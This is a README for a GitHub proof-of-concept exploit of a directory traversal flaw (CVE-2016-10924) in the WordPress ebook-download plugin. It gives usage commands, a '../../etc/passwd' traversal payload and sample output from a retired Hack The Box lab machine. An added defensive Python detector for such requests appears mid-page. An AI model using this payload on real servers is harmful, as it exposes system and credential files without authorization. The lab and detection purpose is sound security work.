Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2). This vulnerability allows unauthorized file reads via a crafted GET request.

808ale/cve-2016-10924-POC

CVE-2016-10924-POC

This repository contains a Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2).

This vulnerability allows unauthorized file reads via a crafted GET request. The exploit leverages a parameter called ebookdownloadurl to traverse directories on the target server.

Description

  • CVE-ID: CVE-2016-10924
  • Vulnerability Type: Directory Traversal
  • Affected Component: ebook-download plugin < 1.2 for WordPress
  • Impact: Remote attackers can read arbitrary files on the underlying operating system, such as /etc/passwd, by manipulating the file path in the ebookdownloadurl parameter.

Note: This PoC is for educational and authorized testing purposes only. Misuse of this information can lead to legal consequences.
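For defenders, the request described above leaves a recognisable trace in web server access logs. The following detection sketch is an added example, not part of this repository's script; it assumes common/combined log format, and the sample log lines (including the `ebooks/guide.pdf` value) are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter as named on this page.
ENDPOINT = "/wp-content/plugins/ebook-download/filedownload.php"
PARAM = "ebookdownloadurl"
# Assumption: access logs use the common/combined log format.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so encoded dot segments become visible."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if any path segment is '..' (a name like 'notes..v2.pdf' is not)."""
    return ".." in fully_decode(value).replace("\\", "/").split("/")

def scan(lines):
    """Return (client_ip, status, decoded_value) for each traversal request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not unquote(url.path).endswith(ENDPOINT):
            continue
        for value in parse_qs(url.query).get(PARAM, []):  # parse_qs decodes once
            if is_traversal(value):
                hits.append((m.group("ip"), int(m.group("status")), fully_decode(value)))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real server.
BASE = '"GET ' + ENDPOINT + "?" + PARAM + "="
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] ' + BASE + '../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] ' + BASE + '%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 0',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] ' + BASE + 'ebooks/guide.pdf HTTP/1.1" 200 52011',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?page=.. HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} {PARAM}={value}")
```

A flagged request that returned status 200 is the one to triage first, since it suggests the file was actually served.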

Requirements

  • Python 3.
  • requests library (install via pip install requests)

Usage

  1. Clone the repository:

    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
  2. Install Dependencies:

    pip install requests
  3. Run the Exploit:

    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
  4. Specify the file path to read: After launching the script, you will be prompted for a file path. For example:

    ../../../../../../../../../etc/passwd

    You may need to adjust the number of ../ based on the webroot location in the target environment.

  5. Exit:

    • Type exit, quit, or press Enter on an empty prompt to exit.
    • Press Ctrl + C to stop the script immediately.

Example

I used this exploit on "Backdoor", a retired Hack The Box machine:

    $ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    [*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.

    Enter File path: ../../../../../../../../../etc/passwd
    [*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
    [+] Status Code: 200
    [+] File Content:
    root:x:0:0:root:/root:/bin/bash
    ...

Disclaimer

This project is intended solely for educational and legitimate security testing purposes.
Do not use the information or scripts within this repository on any system you do not have explicit permission to test.
Author and contributors are not responsible for any misuse or damage caused by this tool.

License

This project is licensed under the GNU 2.0 License. Feel free to use and modify it, but please give credit.

